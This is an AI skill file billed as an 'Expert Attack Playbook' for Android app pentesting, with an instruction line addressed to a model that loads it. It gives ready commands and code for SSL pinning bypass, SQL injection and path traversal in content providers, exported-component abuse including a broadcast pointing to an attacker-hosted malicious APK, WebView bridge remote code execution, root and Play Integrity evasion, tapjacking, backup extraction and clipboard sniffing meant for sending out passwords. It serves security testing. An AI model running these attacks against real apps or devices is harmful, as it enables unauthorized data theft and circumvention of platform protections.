SKILL: Android Pentesting Tricks — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.

0. RELATED ROUTING

Before going deep, consider loading:

mobile-ssl-pinning-bypass for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks
ios-pentesting-tricks when also testing the iOS version of the same app
api-sec for backend API security testing once traffic is intercepted

Advanced Reference

Also load FRIDA_SCRIPTS.md when you need:

Ready-to-use Frida script templates for common Android testing tasks
Detailed hook points for OkHttp, Retrofit, Volley, WebView
Root detection bypass script collection

1. SSL PINNING BYPASS

1.1 Frida Universal Bypass

bash

# Install Frida server on device
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"

# Universal SSL pinning bypass
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause

Hook Point	Library/Class	Coverage
`X509TrustManager.checkServerTrusted`	Android SDK	All standard HTTPS
`OkHttpClient.Builder.sslSocketFactory`	OkHttp 3.x/4.x	Square OkHttp
`CertificatePinner.check`	OkHttp 3.x/4.x	OkHttp pinning
`HttpsURLConnection.setSSLSocketFactory`	Android SDK	Legacy HTTPS
`SSLContext.init`	Android SDK	Custom SSL contexts
`WebViewClient.onReceivedSslError`	WebView	WebView SSL errors
`TrustManagerFactory.getTrustManagers`	Android SDK	Factory-created TMs

1.2 Objection (Quick Method)

bash

objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable

1.3 Network Security Config (Debug Builds)

If you can modify the APK or it's a debug build:

xml

<!-- res/xml/network_security_config.xml -->
<network-security-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user" />  <!-- Trust user-installed CAs -->
    </trust-anchors>
  </debug-overrides>
</network-security-config>

1.4 Magisk Module Approach

Module	Method	Scope
LSPosed + TrustMeAlready	Hooks system-wide TrustManager	All apps
LSPosed + SSLUnpinning	Targeted SSL bypass	Per-app
MagiskTrustUserCerts	Moves user CA to system store	All apps trusting system CAs
ConscryptTrustUserCerts	Patches Conscrypt	Newer Android (7+)

2. COMPONENT EXPOSURE

2.1 Exported Activities

bash

# Find exported activities (AndroidManifest.xml or aapt)
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
  -d "target://callback?token=attacker_token"

# With extra data
adb shell am start -n com.target.app/.TransferActivity \
  --es "amount" "99999" --es "recipient" "attacker"

2.2 Content Providers

bash

# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users

# SQL injection in content provider
adb shell content query --uri "content://com.target.app.provider/users" \
  --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

# Path traversal in file-providing content provider
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"

Provider Type	Attack Vector	Impact
Database-backed	SQL injection via `query()` projection/selection	Data leak, auth bypass
File-backed	Path traversal via URI	Read arbitrary files
Parcelable	Type confusion in custom Parcelable	Code execution

2.3 Broadcast Receivers

bash

# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
  --es "url" "http://attacker.com/malicious.apk"

# Ordered broadcast interception (higher priority receiver intercepts first)
# Register receiver with higher priority than target to intercept/modify data

2.4 Exported Services

bash

# Start/bind to exported service
adb shell am startservice -n com.target.app/.BackgroundService \
  --es "command" "exfiltrate"

# List running services
adb shell dumpsys activity services | grep com.target

3. WEBVIEW VULNERABILITIES

3.1 JavaScript Interface RCE (Pre-API 17)

java

// Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation
webView.addJavascriptInterface(new JSInterface(), "android");

// Pre-API 17: Reflection-based RCE via injected JavaScript
// Inject into WebView:
// android.getClass().forName('java.lang.Runtime')
//   .getMethod('getRuntime').invoke(null).exec('id')

3.2 Modern WebView Attacks

Vulnerability	Condition	Exploit
`setJavaScriptEnabled(true)` + untrusted content	JS enabled + attacker controls loaded URL	XSS → bridge access
`setAllowFileAccessFromFileURLs(true)`	file:// can read other file://	Load `file:///data/data/com.target/...`
`setAllowUniversalAccessFromFileURLs(true)`	file:// can access any origin	Exfiltrate via XHR to attacker
`loadUrl(user_controlled)`	User input in loadUrl	javascript: scheme or file://
`shouldOverrideUrlLoading` bypass	Incomplete URL validation	Redirect to attacker-controlled page
`evaluateJavascript` with tainted data	User data in JS execution	XSS in WebView context

3.3 Deep Link to WebView Chain

1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions

4. INTENT REDIRECTION

Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.

java

// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity

bash

# Exploit: start non-exported internal activity via redirection
adb shell am start -n com.target.app/.ExportedActivity \
  --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"

Pattern	Indicator	Risk
`getParcelableExtra` → `startActivity`	Intent-in-Intent	Start non-exported activities
`getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)`	URL forwarding	Open arbitrary URLs
`getStringExtra("class")` → `Class.forName` → `startActivity`	Dynamic class loading	Start any activity by name

5. ROOT DETECTION BYPASS

5.1 Common Root Detection Checks

Check	What It Detects	Frida Bypass
`su` binary exists	`/system/xbin/su` , `/sbin/su`	Hook `File.exists()` → return false
Build tags contain "test-keys"	`Build.TAGS`	Hook `Build.TAGS` → return "release-keys"
Magisk Manager installed	Package name check	Hook `PackageManager.getPackageInfo`
Superuser.apk present	Su management app	Hook `File.exists()`
RootBeer library	Multi-check root detection	Hook all RootBeer check methods
SafetyNet/Play Integrity	Server-side attestation	Requires Magisk DenyList + module
Abnormal system properties	`ro.debuggable=1` , etc.	Hook `SystemProperties.get`

5.2 Magisk DenyList (Previously MagiskHide)

bash

# Enable DenyList in Magisk Manager
# Add target app to DenyList — Magisk hides itself from that app
# Covers: su binary, Magisk Manager package, mount points, props

6. PLAY INTEGRITY / SAFETYNET BYPASS

Level	What It Checks	Bypass Difficulty
Basic Integrity	Not rooted, not emulator	Easy (Magisk + DenyList)
Device Integrity	Bootloader locked, verified boot	Hard (requires locked bootloader)
Strong Integrity	Hardware-backed attestation	Very hard (hardware TEE)

Techniques:

Magisk with Zygisk enabled + DenyList for target app
Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
Shamiko module: hides root from specific apps
Custom ROM with locked bootloader (Pixel-specific tricks)

7. TAPJACKING (OVERLAY ATTACKS)

xml

<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>

<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->

Android Version	Protection	Bypass
Pre-6.0	None	Full overlay
6.0–11	`filterTouchesWhenObscured` (opt-in)	Apps not using it are vulnerable
12+	Untrusted touches blocked for overlay windows	Partial overlays, timing-based

8. BACKUP EXTRACTION

bash

# Check if backup allowed
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)

# Extract backup
adb backup -f backup.ab -apk com.target.app
# Convert to tar
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar

# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data

9. ADDITIONAL TRICKS

9.1 Debuggable App Exploitation

bash

# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's user — full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml

9.2 Drozer (Component Testing Framework)

bash

# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2

# Query provider
dz> run app.provider.query content://com.target.app.provider/users
# Scan for injection
dz> run scanner.provider.injection -a com.target.app

9.3 Clipboard Sniffing

java

// Pre-Android 10: any app can read clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});

10. ANDROID PENTESTING DECISION TREE

Testing Android application
│
├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis
│
├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)

android-pentesting-tricks

NPX Install

Tags

SKILL.md Content

SKILL: Android Pentesting Tricks — Expert Attack Playbook

0. RELATED ROUTING

Advanced Reference

1. SSL PINNING BYPASS

1.1 Frida Universal Bypass

1.2 Objection (Quick Method)

1.3 Network Security Config (Debug Builds)

1.4 Magisk Module Approach

2. COMPONENT EXPOSURE

2.1 Exported Activities

2.2 Content Providers

2.3 Broadcast Receivers

2.4 Exported Services

3. WEBVIEW VULNERABILITIES

3.1 JavaScript Interface RCE (Pre-API 17)

3.2 Modern WebView Attacks

3.3 Deep Link to WebView Chain

4. INTENT REDIRECTION

5. ROOT DETECTION BYPASS

5.1 Common Root Detection Checks

5.2 Magisk DenyList (Previously MagiskHide)

6. PLAY INTEGRITY / SAFETYNET BYPASS

7. TAPJACKING (OVERLAY ATTACKS)

8. BACKUP EXTRACTION

9. ADDITIONAL TRICKS

9.1 Debuggable App Exploitation

9.2 Drozer (Component Testing Framework)

9.3 Clipboard Sniffing

10. ANDROID PENTESTING DECISION TREE